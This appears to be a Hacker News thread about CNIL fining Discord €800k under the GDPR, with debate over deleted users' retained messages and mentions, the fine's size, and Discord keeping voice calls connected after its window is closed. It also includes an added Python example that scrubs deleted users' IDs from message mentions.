Discord fined €800k for failing to comply with several obligations of the GDPR (cnil.fr)
260 points by Signez 71 days ago | 285 comments

Sorry, but the points are totally valid. If you delete your account your messages are still available with a userid that, if someone has it, can be traced back to you. They also don't delete files or pictures you uploaded; for this alone they should get fined.

I think they ended up fixing this, all the deleted users I can find resolve to UID 456226577798135808.

Although, messages that used to @mention the user don't have their UID mangled (since @mentions are really `<@userid>`), so it'd be easy to correlate someone @pinging a deleted user and that deleted user responding to the ping. Seems like fixing this would be pretty challenging (logistically and computationally) given you'd have to arbitrarily edit other people's messages.

Mentions are also listed in the message metadata, in the allowed_mentions field, therefore it should be very easy for Discord to strip mentions of deleted users' IDs.
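An added example, not part of the thread and not Discord's code: a sketch of the audit and scrub the two comments above discuss, where a deleted author already shows the placeholder UID but `<@userid>` mentions in other people's messages still carry the original ID. The message layout (`id`, `author_id`, `content`, `mentions`) and the sample data are constructed for illustration; the older `<@!id>` nickname form is handled as well.

```python
import re

# Placeholder UID that, per the comment above, deleted accounts resolve to.
DELETED_USER_UID = "456226577798135808"

# User mentions are embedded in message text as <@id>; <@!id> is the older
# nickname variant. Only the numeric ID is captured.
MENTION_RE = re.compile(r"<@!?(\d+)>")


def find_residual_mentions(messages, deleted_ids):
    """Return (message id, user id) pairs where the text or the mention
    metadata of a message still names a deleted user's original ID."""
    hits = []
    for msg in messages:
        referenced = set(MENTION_RE.findall(msg["content"]))
        referenced.update(msg.get("mentions", []))
        for uid in sorted(referenced & deleted_ids):
            hits.append((msg["id"], uid))
    return hits


def scrub_message(msg, deleted_ids):
    """Return a copy of msg in which every mention of a deleted user, in the
    text and in the metadata list, points at the placeholder UID instead."""
    def swap(match):
        if match.group(1) in deleted_ids:
            return f"<@{DELETED_USER_UID}>"
        return match.group(0)  # mention of a live account: leave untouched

    cleaned = dict(msg)
    cleaned["content"] = MENTION_RE.sub(swap, msg["content"])
    remapped = [DELETED_USER_UID if uid in deleted_ids else uid
                for uid in msg.get("mentions", [])]
    # Several deleted users collapse onto one placeholder; keep it only once.
    cleaned["mentions"] = list(dict.fromkeys(remapped))
    return cleaned


def scrub_all(messages, deleted_ids):
    """Scrub a whole channel history without mutating the input."""
    return [scrub_message(m, deleted_ids) for m in messages]


# Constructed sample history. User "222" deleted their account: their own
# message (m2) already shows the placeholder author, but m1 and m3, written
# by other users, still carry the original ID and so link m2 back to "222".
SAMPLE_MESSAGES = [
    {"id": "m1", "author_id": "111",
     "content": "<@222> are you coming tonight?", "mentions": ["222"]},
    {"id": "m2", "author_id": DELETED_USER_UID,
     "content": "yes, see you at 8", "mentions": []},
    {"id": "m3", "author_id": "333",
     "content": "cc <@!222> and <@111>", "mentions": ["222", "111"]},
]
DELETED_IDS = {"222"}

if __name__ == "__main__":
    print("before:", find_residual_mentions(SAMPLE_MESSAGES, DELETED_IDS))
    cleaned = scrub_all(SAMPLE_MESSAGES, DELETED_IDS)
    print("after: ", find_residual_mentions(cleaned, DELETED_IDS))
    for m in cleaned:
        print(m["id"], m["content"], m["mentions"])
```

An ID typed as plain digits outside the mention syntax is not caught by this pattern and would need a separate search.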

In any case, 800k is a ridiculous amount for such a huge company like Discord.

Fines will go up if they don’t fix it.

They’ve probably never made any money.

"in August 2021, Discord had reported $130 million in 2020 revenues, triple from the prior year, and had an estimated valuation of $15 billion"


Revenue is not profit. You need to subtract expenses and whatnot.

That’s right. But for GDPR no one cares about profits. They need to be fined on revenue.

Otherwise non-profit making companies could do any privacy BS and not be fined.

They need to be fined based on gross annual worldwide revenue or market cap, whichever is greater.

Good point.

There's no evidence in that sentence that they have made a dime.

The company may not have recorded any profit, but the founders and other equity holders can leverage or sell that equity worth $15B.

Where do you find their revenue stream data?

Isn't that the case for Gmail? If you send me an email with a picture in it, then delete your email account, I can still see your email when logging into my Gmail.

No. Email is private messaging.

If you send email to me and then delete it in your end, I'm allowed to store your email as a whole (sometimes legally obliged).

And if I send an email to 200 recipients they can all store it, I don’t see the fundamental difference for discord TBH

>email to 200 recipients they can all store it

On discord there are no 200 individual "they" storing it. It's stored by discord. (Or I guess people could be manually logging their own chats, but that's not the issue at hand here.)

At first pass it might sound like some minor technical squabble about implementation details, but there is intentionality in design decisions. The legal system can not be blind to those.

Discord chose a design that put them in control of the data. I'm not saying the highly centralized nature of their design is bad, wrong, or wasn't the best choice for the product they want to build. What I am saying is that when the legal system looks at the nature of a product, it has to look beyond what's presented in the pretty UI and marketing materials. It will look at the business' processes too.

But that’s the same for gmail. If I send a mail to 200 gmail contacts, that mail doesn’t disappear when I delete my account

True. This is why I mentioned intentionality in design.

The design of email means there is an argument for the legal system that gmail is a very very popular post office. That email is a system wherein users have disparate storage areas for receiving/archiving emails, and gmail is one of many organizations that offers users the service of managing their individualized storage area on their behalf.

In the service that is email, there is nothing inherently special about gmail. In the service that is discord, discord is discord.

I would argue that discord and IRC, are email too. It's just the protocol of communication dictates. They all carry data to a username@somewhere; whether it is a TLD, username or ID.

IRC enables Text & Attachments in text form (ie links)

Email Enables Attachments in visual (html emails)

Discord Enables Voice, Text and Attachments (Asynchronous sockets)

That's all it is. Present a Video, Picture, Voice to your visitor and you've got a new product. Just as Facebook, Twitter, Myspace have been.

> I would argue that discord and IRC, are email too. It's just the protocol of communication dictates.

Assuming all this is correct, if a GMail user requests their account to be deleted, Google should delete that data.

But it does disappear when all 201 of you delete your accounts.

You can save a screenshot discord chat too. There’s nothing wrong with that. If someone published something and you want to save a copy for personal purposes, go ahead.

The difference is in what Discord’s responsibility is.

If Discord claimed to have deleted an account, then they shouldn’t still be publishing a post from a user. Especially if such a post could still be tied back to the historical user id.

I can understand why they’d want to keep the data (sometimes you need to keep an archive of posts for legal reasons - for a limited time). But making an archived post visible to the public is the problem.

An even better analogy would be a mailing list, instead of directly emailing/cc-ing recipients. Definitively not "private messaging".

If I delete my email account, and/or remove it from the list, there's no expectation that my prior emails are deleted for any of the other list subscribers.

The mailing list archive isn't pruned of my account and everything I ever sent will still be visible.

You’d have the right to request removal of your messages from the central mailing list archive (I believe), but not the copies received by the individual mailing list subscribers.

With Discord, all messages are in the “central archive”, there are no individual copies.

One difference is that you sent the email to those 200 recipients specifically, whereas in Discord you published your message to a channel whose future membership is an undetermined set of people (everyone who joins).

Taking a mailing list as an analogy: If there is a central archive of the mailing list, you can request removal of your messages from that archive, but not from the individual recipients who originally received the message.

There are two fundamental differences.

1. With email you send messages to a specific, finite list of recipients.

2. With email, a change of recipient list will not send them past messages, whereas once you have access to a Discord channel you get access to history too.

It's the case for slack, insta, Facebook, Twitter, Tumblr, bereal, TikTok and snap. I am not talking about pms but public posts.

All emails and attachments are a part of your allowed cloud storage capacity, and you have to be explicit in whom you're sending emails to.

Discord is none of that. They never tell you that your messages and media are forever. If you get banned from a server or leave, all of your stuff is still there. There is no reason for this other than eventually selling that data or other evil purposes.

But it’s a chat application, those messages aren’t owned by just the user that authored them. Even if a user deletes their account I should be able to go back in my chat history and find their messages and know it was them.

It would be stupid if someone closing their cellular account would somehow reach into my phone and delete their contact, their messages, and replace their phone number with all zeros and this is semantically the same, the implementation shouldn’t matter.

If you send a message to a group chat those messages are now owned collectively by the group and individually by each member; the GDPR is forcing companies to delete my data because someone else asked to delete theirs.

I would say there's a real semantic difference between whether those files are stored and managed on your device, or on the provider's servers. If they're only on your device, have fun with them, but they are not allowed to store or touch data that I (as the sender) have instructed them to delete.

I agree with you in principle and I think that the EU is basically extorting American companies, but in your example all that information is stored in your phone, while in this case the information is stored in Discord's servers.

American companies are free to not do business within the EU. If they do, they must comply with the law. Same with USA, China, Russia, etc.

What about users from the EU who want to use those services despite the EU not liking them? Fuck them, right?

Yes but if the law was “Fuck You America Act: 5% of global revenue from US based companies goes to us because we can” then the US government might have opinions about that when it comes to trade negotiations.

The question is whether this law is closer to fuck you than it is reasonable regulation of bad behavior.

Right which to me is a distinction without a difference. If you and me are both Gmail users and you send me an email then delete your account should Gmail have to reach into my inbox and delete your emails? They’re on Google’s servers after all.

There's a spectrum of things I can share with you over gmail. Currently, if I share an email with some formatted text and attachments up to 25MB, then it's yours to keep, but anything above 25MB is shared as a link to a Google Drive upload, which remains under my account, and I can always delete or modify.

But I don't see any particular reason for where exactly the line between the two should be - why wouldn't it be that I could make anything I shared with you ephemeral, a-la Snapchat? And going back to email, it was actually MS Exchange who have supported the option to "Recall this message" [0] for many years, while gmail decided to not implement anything like that.

[0] https://support.microsoft.com/en-us/office/recall-or-replace...

Interesting; for me the line seems fairly thick at "ownership" level (which just shows we may have different assumptions :)

My thoughts:

If it's in my inbox (whether on my physical phone, or hosted for me by a service provider), I own it and I get to control it regardless who sent it / how it got there (as long as other legal pre-requisites are met, i.e. not child porn etc)

If it's in my outbox, and I want to delete my account, THOSE instances of those artifacts should be removed, whether from my physical phone or by the service provider hosting them for me. If I've sent them to others, fair game, they own THOSE instances; but I expect the service provider to remove, upon my request, the artifact instances I solely own.

There is definitely a difference between PII data of different users being distributed rather randomly across personal devices vs. it being consolidated within a single company which can then proceed to use that data for all sorts of purposes you may or may not have agreed to.

It's about technical capability.

In this case, Discord is a very centralised service. They store all of the messages centrally, so can easily comply with the request.

Other services like email may not be able to do that, so they could use that as a defence when asked why they aren't deleting all data.

Does GDPR distinguish these cases? Personal information is fine to keep on an individual's computer, but not on a company computer? What about personal cloud storage like Google Drive (company's servers, individual's data)?

If they want it to work as you posit, they should not save all the data in Discord's systems, but create a distributed chat system.

What’s the difference between Discord and two Gmail users communicating? The data is all on Google’s servers.

If we work on a Google Doc together should deleting your account delete my document as well? They’re both on Google’s servers and on the backend we don’t have separate copies.

Discord is a massive data store. They hoard messages. The only reason for this is to someday sell it. It doesn't matter what the CEO says, it's the investors that own it. They either have to become profitable, or sell.

Not only should they get fined. They should also fix the problem.

Yep, that's typically how this works - there's a small immediate fine for the current issues, but there'll be rapidly increasing fines in future if the issues continue beyond a reasonable timeframe to get this fixed.

They did. The CNIL did several controls and verified that they indeed fixed the issues.

How does this work for IRC networks?

IRC networks don’t generally store messages and your client only receives messages that are sent while connected to the network. Users can set up their own infrastructure to store messages received by their client, though, so you never know who might be collecting logs.

So I think you could get sued for hosting logs, or you must provide a way to delete data per request.

An IRC network is simply a relay. It doesn't have anything to delete to begin with.

True, though the "owners" (what's the term I'm looking for here?) of some channels do public logging

e.g. https://irclogs.ubuntu.com/

You’d have the right to request removal of your messages from those logs.

I'm sure most sizable IRC networks have some level of logging if only to validate claims of spam or rule-breaking.

Even with that. It's anonymous if you don't log in. All you do is pick a name you like, type something random and exit. And all they have is an IP address that may change at any time.

I am not sure if GDPR should apply if that can't be used to trace back to you in the first place.

And if this should apply, I think everyone on earth who connects to the internet is probably in danger. You visit my site and leave a message. And I am suddenly a target of GDPR, what?

Also, does GDPR actually care about internal logs? I think the requirement is that the data on that platform can no longer be used to trace back to the user. But logs aren't even exposed to users.

Yes, GDPR cares about internal data like logs, because companies get breached all the time and data gets leaked.

Since GDPR, PII (Personal Identifiable Information) data has become radioactive; the less you touch it, the easier your life is.

I think I read somewhere that they do delete files and images after some time.

Props to the EU for keeping data giants accountable. It is a shame the data protection authorities only have resources to process so many companies, unfortunately, many get away with much more harm to user privacy.

Each country also has its 'in house' version, that prosecutes various offenders on a local/their-national level.

In this case the fine has nothing to do with keeping data secured.

1. Failure to define and respect a data retention period appropriate to the purpose

2. Failure to comply with the obligation to provide information

3. Failure to ensure the security of personal data

4. Failure to carry out a data protection impact assessment

While not a direct security breach investigation, these have high impact on user data. (edit: formatting)

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. However, in Microsoft Windows, clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applications.

Interesting this is considered [Microsoft] Discord's fault and not Microsoft Windows. I quit Discord with Cmd-Q, does Alt-F4 not do the right thing on Windows? The only popular program I know evil enough to override Cmd-Q is Chrome, and I blame Apple for the failing.

>Interesting this is considered [Microsoft] Discord's fault and not Microsoft Windows.

Probably because Discord implements the button, no? They configure what happens when you press "X", so their configuration is in violation, not the platform.

This whole thing is making my head ache.

Pressing X or Alt-F4 sends WM_CLOSE to the window. By default this is converted to WM_DESTROY and closes the window. By default, an application with no more windows open will exit.

It's quite normal for applications to intercept WM_CLOSE, for example with a modal dialog of "Do you want to save your files?".

Over the past few years it has also become common for applications, including Microsoft Teams, to interpret "all windows closed" as "minimise to Systray". Microsoft also responded to increasing use of the systray by auto-hiding most apps in it.

The issue is not "minimise to systray" per se, it's "sending user voice when the user thought they'd closed all the windows".

(bonus stackoverflow: you can separate the behavior https://stackoverflow.com/questions/9788662/how-do-i-repurpo... )

Discord's X button is implemented inside the webview and simply hides the window (to be revealed later by clicking the tray icon). It does not send WM_CLOSE or WM_DESTROY.

Alt+F4 is what actually closes the window, and in Discord's case, the entire rest of the app too.

>Over the past few years it has also become common for applications, including Microsoft Teams, to interpret "all windows closed" as "minimise to Systray".

More like the past few decades. Seriously, this has been a thing (usually configurable in app settings, and common in many long-running applications like messengers and music players) for as long as I can remember.

But Windows misrepresents that the application is not running, when it is running in the background with access to the mic. Is this not a poor default? The justification here is that Discord behaves differently from "the vast majority of applications". First, I'm not sure if that's true. Second, another justification brought up is that Discord doesn't show the user that their mic is still hot, Windows seems just as culpable for not "protecting by default".

For example, on my Android phone, whenever the mic/camera is in use, even if the app is in the background, the OS displays a green dot in the corner of the screen and when I poke it, it tells me what is using the mic/camera. This is a good default.

I don't think Windows is culpable instead of Discord, but I do think that more protection should be built into Windows, and based on this decision, Windows could get dinged for this as much as Discord.

I would say it shows an icon on the system tray, but I think recent versions of Windows like to hide unused icons for whatever reason.

In my experience; quite a few programs will minimize to system tray when pressing x.

The issue highlighted in the article is no other VoiP/chat program will continue to record audio in the background. Which you can absolutely do, just don't make it the default behaviour. Valid point in my view.

"The issue highlighted in the article is no other VoiP/chat program will continue to record audio in the background. "

Just tested in a call with Skype. Closing the windows still has the program running, recording, and the call is still active.

Ditto Camfrog.

Ditto Paltalk.

That's because most actual programs have a 'minimize to tray on closing' option enabled by default on install.

It's been like this since 1998 or so. I've been undoing that option for at least 20 years, because when I click X I expect it to GTFO.

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. However, in Microsoft Windows, clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applications.

So just the same as Microsoft Teams or the vast majority of nowadays applications.

Importantly, Teams will leave a meeting if you exit the Meeting window.

Keeping the meeting going in the background is honestly pretty crazy.

I think in the Discord model it makes more sense because it's based off of how online gamers flow (basically open a voice chat and stay on there for hours on end).

It's still outside the norm on Windows I would say, even though I understand why they did it.

Gamers obviously don't talk only when they open Discord. They talk in 'game' with Discord minimized. It would be dumb if hiding Discord to the background while continuing to chat were a manual action by default. But that behaviour can be changed. You can ask Discord to exit the app when you click X if you prefer. There is an option for it.

And about Teams... who the heck wants to be kept in a meeting if they are already ready to close the app?

They are just different mindsets.

It's by design, so you can voice with people while playing multiplayer games.

Minimising the window would achieve that, it's not necessary for closing it to also do so.

Closing the window frees up some video RAM, as you are no longer processing and displaying video streams from the voice/video chat. Minimizing the window keeps that RAM in active use.

Then that's also an issue that Discord should work on.

The majority of that issue IIRC lies upon the Microsoft Window Manager, and if true, not much Discord can do about that.

Sure, but if Discord is processing and displaying something, Discord can change that behaviour when it's minimised.

Huh? He just explained how that's not how it works. Are you suggesting Discord mail angry comments to Windows' window manager team?

Discord is choosing to display things and can tell if you have minimised it, they don't need Windows to make any changes.

You can play multiplayer games with a window open though (as long as it doesn't try to stay in front of your game), right?

I think Teams shows a pop-up the first time its window is closed.

I'm pretty sure teams boots you out of the call too? I'm sure I've left meetings by accident that way before.

( Then again, it's not even clear what "teams" is these days given that I've somehow ended up with 2 completely incompatible copies installed on my machine. )

Teams was more nefarious than that: if you click the X it minimizes the application; if you click exit the application from the menu, it keeps a background process alive, i.e. a separate application, that you need to also exit. I hope they get fined to hell for that since it is so annoying.

They seem to have since fixed this, but for most of the pandemic it was as described. Very annoying at the least.

Docker Desktop does the same. You do not want to close Docker when you close the main window, you don’t want Discord notifications to stop (or even the audio call) when you close the main chat window.

> does Alt-F4 not do the right thing on Windows

Alt-F4 closes the _window_, not the application. If the application can 'survive' without a window, not exiting the application is the correct behaviour.

Except for Discord, which actually closes the entire application on Alt-F4 instead of just the window.

Huh. You are right. Alt+F4 closes the application, clicking the X closes the window. Kinda inconsistent.

Alt+F4 closes the window, clicking the X causes the window to hide, not close.

Alt-F4 invokes different processes than the X button does. The X button is more akin to CTRL-F4.

Nah, they both send WM_CLOSE to the window. The actual problem is that Discord uses its own non-native window frame and reimplements the X button differently than they handle the actual close event.

Alt-F4 closes the window for me on Discord, not the app. There's a setting for that I suppose.

Alt+F4 kills the process.

Alt+F4 asks the window to close. If it's the main window, this will by default terminate the message loop, shutting down the application. But the application is free to handle the message whatever way it likes. Asking for confirmation, ignoring it, hiding it or closing the window without terminating the process.

Like many (most?) applications which show a notification icon, discord hides the main window when the user presses Alt+F4 or clicks on the X instead of closing it.

No it doesn't.

If I open blender and hit 'Render Image', a new Window will open with the rendered image. This does NOT spawn a new process. Hitting Alt+F4 on this window closes the window. This does NOT kill a process.

Nope, Alt+F4 is the close window shortcut.

This is even visible in the OS-controlled Window Menu - hit Alt+Spacebar in any window of any app, and you'll see the Window menu appear, which will include an option for Close (the current window), showing that the shortcut for it is Alt+F4. This is even true for modal dialogs (if they are real Windows modal dialogs).

Weirdly enough, Alt+Spacebar, then clicking close only closes the window (minimizing to the tray), but just hitting Alt+F4 kills the process.

You mean for Discord I assume? That is strange indeed - though of course Windows has always allowed apps to modify any kind of behavior they want (for better and for worse).

Guys, I don't know why I'm getting downvoted - on my Windows 10 machine, newest Discord version -> Alt+F4 kills the process and X-ing the app does not.

>I quit Discord with Cmd-Q, does Alt-F4 not do the right thing on Windows?

I think the expectation of Windows users is that the X does in fact quit the application, so they don't reach for Alt-F4 the same way Mac users reach for Cmd-Q when they want to quit an application.

Basing this on the common complaint of "Why does the application still stay in the Dock after I close it?" from Windows to Mac switchers.

Plenty of Windows applications continue running in background by default after pressing X. It's so widespread that I'd say it's the expected behavior for anything that has a tray icon (Discord does). Most apps that are designed to run in background behave like that by default - media players, torrent clients, sync and backup programs, communication apps, even VMs.

For applications with an open mic to disappear into the Tray Icon without any visual indicator in the UI that the mic is still open however is very uncommon.

Judging by the amount of garbage I usually see in the tray for "regular" Windows users, I'm not sure if they actually understand it.

It's hard to blame apple or blame microsoft for simply having a different convention, which they've long had, I remember struggling to use an iMac back in the day because nothing ever quit when I wanted it to, but I accept that their model is different.

In Windows it's convention for the top right X to be "Quit Application" and equivalent to alt+f4.

It can be useful to have X close to system tray, in which case they can be configured to act that way on an opt-in basis.

I'd still expect an active call to close however, unless a very specific single-purpose thing like mumble. (Which still has "close to tray" opt-in iirc ).

The wider frustrating point is the erosion of the desktop as a whole and the abandonment of native desktop toolkits means it's a total crap-shoot now how something will behave by default, not just on this issue but a whole range of them.

The convention on Windows has always been that Alt+F4 or the X button (or the Close action in the Window Menu) will close the currently focused window (this even works for dialog boxes in Win32 apps!). There is also a softer convention that apps exit when their main/last window is closed, but this has never been a strong convention, and Chat apps in particular have been exiting/minimizing to systray when their windows are closed for decades at this point.

However, keeping an active voice session open with no window open is definitely outside the norm - most apps with audio chat that I know have the audio chat strictly tied to a window.

> In Windows it's convention for the top right X to be "Quit Application" and equivalent to alt+f4.

Depends on the app. Some apps, specifically communication, have a convention of: "_" minimizes to taskbar, "X" minimizes to tray. The latter is used constantly because I don't want Discord sitting in my taskbar half the day, but I want to stay online (and sometimes in a voice chat with friends).

On that note, I find this point completely ridiculous given that: (A) Discord notifies you the first time you "X" it that it minimized, and (B) IM apps dating back to MSN Messenger in 2003 would do this.

AFAIK ALT+F4 is the equivalent of clicking the close window button on Windows, or on macOS. It does not necessarily quit the application.

Teams and Spotify, for example, by default don't quit. Many others have a "keep application running when window is closed".

And users hate it.

Doesn't Skype have the same behaviour? Clicking "X" doesn't close the application.

Chat apps had that behavior since decades ago, ever since Windows95 got a systray. It's nothing new or special, it's kind of expected at this point.

Though I think here is a failure of Microsoft to improve the UI and use different symbols for closing the app and suspending it into the systray.

Either way, seems like a rather strict interpretation of 25.2. That said, I kind of welcome it. The principle of least surprise is something that should be much more strictly enforced and a lot of social apps make it way too easy to accidentally leak data into the public.

I would say closing the window of a chat app killing the ongoing chat session is more surprising than not. The worst you should do is a prompt with yes/no and a checkbox to remember my decision when you do it the first time.

Even AOL instant messenger did this. It would exit the window but still leave the application running with an icon in the systray area adjacent the clock.

Skype is the reason this behavior was popularized in VoIP apps. TeamSpeak and Mumble have a setting that allows this too, because people got used to Skype not shutting down after clicking "X".

Wasn't it MSN Messenger?

Yes and Slack does the same.

I like the CMD+Q Chrome implementation on macOS and would like to see it everywhere; it essentially acts as a confirmation since it will quit if you press again or you do a long press.

See, Apple put @ on Q in some languages[0] and you are required to press OPTION+Q to type @ and quite often you end up closing the app when you are trying to type an e-mail address. It's particularly annoying in browsers when you accidentally close the browser when you are about to complete a long form. I've overwritten the CMD-Q for Safari due to this particular reason.

[0] https://i.imgur.com/bx6XsIh.png

The @ on Q is a keyboard layout standard adopted by some languages. At least it's not Apple's design decision.

I'm Icelandic and a programmer. I work with US Ansi layout keyboards. Working with Icelandic ISO layout is horrible when programming. All the "programming" keys are strewn all over the keyboard and hidden under the option layer. I think they did this to make space for the special letters in the Icelandic language. On the other hand in the US Ansi layout the "programming" keys are close to the home row.

Couple of examples, but you can find more if you want to: {} is easily accessible on the US Ansi, but Icelandic ISO it's under option+7 and option+0. ; is right under your pinky on the home row on the US Ansi, but shift+, on the Icelandic ISO layout.

The @ is also on Q on the Icelandic keyboards. Which is absolutely insane, because quitting applications in macOS you do cmd+Q and on windows I think it is ctrl+Q. On windows you have to do alt-gr+Q to get the @ symbol. But on macOS you can do both option+Q or option+2. I use the option+2. I'm not pressing that Q with a modifier combo, unless I intend on quitting something.

It's not Apple's fault. @ being on Q is the German national norm [0].

The problem is people who are accustomed to Windows keyboard layouts (which matches the national norm) - they are accustomed to Alt Gr+Q for @, and the Alt Gr key is on Windows the key right next to the space bar... which means they press Cmd+Q on Macs instead out of muscle memory.

You can put in a Windows keyboard layout that restores your sanity on macOS [1] with only the small re-learning of using right Option instead of cmd, the problem is stuff like Adobe Premiere outright refuses to load keyboard shortcuts if it doesn't recognize the keyboard layout.

[0] https://de.wikipedia.org/wiki/DIN_2137

[1] https://jankarres.de/2013/07/windows-tastaturlayout-unter-ma...

That is a regrettable choice on Apple's part. First, on the US layout at least, there's a series of standard overrides dating back decades. OPT+Q is the rarely used œ (@ is SHIFT+2 on most US layouts), but some are helpful like ® (R), π (P), etc... Second, some apps bind OPT+KEY to commands!

Nope. It's a country/language choice. Not an Apple choice.

"clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applications."

It used to be like you describe, but this is a disappearing rule. An increasing amount of companies build apps designed in a way that you need to have sysadmin skills to actually terminate the program for real.

We can't expect Microsoft to require developers to implement this 'X' correctly because Microsoft itself is exploiting this loophole by keeping some of its apps alive when the user clicks the 'x' button.

This is a common trend I already mentioned here several years ago initiated by GAFAM companies to subversively rewrite the signification of common concepts that they disagree with:

- "no/decline" -> maybe later
- "no/decline" -> skip for now
- "no/decline" -> remind me later
- "close" -> sleep / run into background
- "delete data" -> hide/hide temporarily
- "delete account" -> deactivate (but keep everything)
- "somebody" -> best friend
- "buy/pay" -> rent
- "configure" -> submit your preferences, we will take that into account

etc.

All these concepts are being actively stolen from the population and I am terribly saddened to see the vast majority of our regulators have absolutely no clue about the long-term consequences of these concepts being stolen/rewritten without tacit consent.

So, yes, Discord rewrote the 'x' button but to be honest: who cares? Apparently only too few.

Why do apps think it is necessary to start playing with the UI when we have a minimise button? When I click "X" I expect the application to exit as it did in Windows 1.0 and the minimise button to either put it in the startbar or the status bar but keep running.

EDIT: I remembered incorrectly, Windows 1.0 did not have a X button but a close button on the right side of the window.

Apps minimizing to systray when their main window is closed have existed since at least Windows 95/98. Yahoo! Messenger and probably AOL did the same thing 25 years ago.

Minimising to the systray isn't so much the problem as remaining connected to the voice chat. Skype in this circumstance doesn't fully minimise but still has a little foreground window making it obvious that you're still on the call.

Yes, that much I agree with - having an ongoing voice call with no active window is definitely not normal behavior. Even playing audio with no visible window is strange, but recording is even stranger.

Minimize keeps cluttering up the taskbar. That's why all persistent-background apps go into the systray, be it chat apps, mouse drivers, graphics driver or whatever. You don't want them to fill up your taskbar for no reason. This has been common practice since the Windows95 days.

Windows could handle this a bit better (e.g. different symbol than "X"), but there is nothing wrong with the behavior itself. A clear icon to indicate that the mic is in use wouldn't hurt either.

This is a case of lackluster UI that everybody got used to over the years and never fixed, not some kind of evil dark pattern thing.

I think people are just arguing that this is a terrible practice. Instead of having a clogged up taskbar, you have a clogged up tray. In hindsight, Microsoft should have somehow added a better UI affordance back in the 90s, to disincentivize this abuse.

Mac has its own share of applications going against the OS convention. There are quite a few third party Mac applications that annoyingly force the process to exit when the user closes the main window. There are Mac apps that are also starting to intercept ⌘Q and not exiting the process or, infuriatingly, making you hold the key down in order to actually exit (I'm looking at you, Chrome).

I wish product designers would please just stop thinking their app is uniquely special, second guessing OS conventions.

> When I click "X" I expect the application to exit as it did in Windows 1.0

X didn't appear until Windows 95.

In Windows 1.0 there was no X button.

On macOS, you can already close all windows without exiting an application, so Discord does not violate any established convention. (Clicking the red traffic-light close button does not usually close the entire app; Cmd+Q does.)

On Windows, there is no concept of applications at all, only windows. Perhaps you can try to mess with processes, but there's not even any mechanism for activation of a process that would even allow it to begin to work in any way similar to macOS's model.

So yes. Closing all windows, on Windows, is widely assumed to terminate the associated process. This is why apps like Thunderbird, for example, close entirely when you click the X, and only actually go to the system tray when you click minimize.

Interestingly, with Discord on Windows, Alt+F4 completely closes the entire app. The close button is implemented by the webpage, however, and closes to the system tray instead of actually closing the window.

> The only popular program I know evil enough to override Cmd-Q is Chrome, and I blame Apple for the failing.

TBF I've been saved a few times from losing all my browser state by accidentally hitting cmd-Q.

> does Alt-F4 not do the right thing on Windows

It usually closes the active window, but Discord does close the entire application for some reason.

Yes, Alt+F4 does close the application (no more process). Clicking on the X closes the window and moves the icon to the system tray, effectively hiding the icon and making the icon on the task bar disappear (or if pinned seem like the application isn't running).

Anecdotally, I rarely use alt+f4 to close a window.

Not sure about Discord, but for Teams and Slack, there is no difference between clicking the X button, hitting Alt+F4, or accessing the Window menu (hard to do) and selecting Close from there; which is not surprising, as Alt+F4 is the shortcut for the Close action, which is the equivalent of the X button by convention.

Discord does close the entire application on Alt-F4 instead of just the window, it's quite weird.

> Alt+F4 does close the application (no more process)

Alt+F4 never closed the application. Alt+F4 closes the window. That said, _some_ applications do close when their primary window is closed.

Somehow I missed the part of the "very easy to understand and straightforward GDPR" that prohibits this. I've been saying all along that this regulation is dangerously boundless, but I can't wait for someone to justify to me why this actually makes total sense.

> does Alt-F4 not do the right thing on Windows?

Alt+F4 does close the application, "X-ing" it however puts it into the system tray and it remains active, which bothered me from the first day I've been using it.

Not sure about Discord, but this would be extremely weird behavior. The extremely clear convention on Windows is that Alt+F4 closes the currently focused window, not more, no less.

Whether closing the current window should close the application or not depends on many things, but having different behavior between Alt+F4 and the window close button would be very strange.

Seems insane, many apps keep running with an icon visible in the notification area when exited like that. Discord's icon also shows if you are in a voice channel.

It's not just that the application keeps running, but the active voice call you're in stays connected and everyone can still hear you. That is definitely counterintuitive, I would at least expect a popup saying "did you mean to close the call, this is just minimizing it to the background" or something.

Also, that's 1 of 5 issues.

It's not counterintuitive to anyone who has used a VoIP application in the past ten years.

Well one of Discord's main demographics (which they intentionally target) is kids, who often haven't used any other VoIP application outside of a phone.

Discord did not get this fine for this one point, but for the sum of all issues.

Yeah, but the fact that they got money from them for this "issue" is laughable.

They "didn't get money from them", the EU is not some sort of criminal operation.

They fined them based on violations reported by users and Discord can contest this in a court of law.

No, they got money from them for the other issues probably.

Something worth noting that a lot of comments are ignoring here: while this fine is coming from the EU, these kinds of data protection rules are _everywhere_ now - this is no longer really EU-specific.

The reality is that it's not a US companies vs EU data protection law battle - it's US companies vs data protection laws in the comfortable majority of all other developed nations. The EU, UK, Switzerland, Canada, Brazil, Israel, South Korea, Argentina, Japan, New Zealand, Indonesia, Uruguay, etc, all have substantial data protection legislation. The EU has a published list of countries whose data protection laws are considered equivalent to GDPR: https://ec.europa.eu/info/law/law-topic/data-protection/inte...

While it's the EU fining Discord in this case, presumably the equivalent laws in each of those countries would also come to similar conclusions everywhere else too (though so far it seems the EU has more political appetite and clout to press the issue).

There's no world where Discord or other major US companies can pull out of the EU and keep following these practices, even if that was worthwhile. To avoid having to implement data protection practices, they'd have to drop the vast majority of all international users (and in Discord's case, https://www.similarweb.com/website/discordapp.com/#traffic suggests the US is currently <30% of their user base, so that's just not happening).

Have those other laws been enforced against Discord? Also, pulling out of one zone because they enforced (what you believe to be) an onerous law against you is always valid, it'll make the others think hard about enforcing the law against you.

> it'll make the others think hard about enforcing the law against you.

We are not talking about some high-security military stuff here, it's only a chat app.

It might be a big part of your world, but I can guarantee you that if they try to pull that off nobody in any government would care.

I am pretty sure of the contrary actually: that several governments in the EU have dreams of getting rid of these platforms, and that they can't do it because that would be illegal.

If every chat app makes the same determination and disables itself in the EU no one will care? I doubt that.

VPNs exist. I fairly frequently come up against US websites that say 'content not available in your area due to GDPR'. Thankfully the VPN I use is three clicks and I'm in America.

Not many people use VPNs.

Just because I haven't logged in in two years doesn't mean I want my account deleted... And they get fined for putting the app in the tray when the user clicks the X button? And because they accept 6 character passwords? Those regulations are insane.

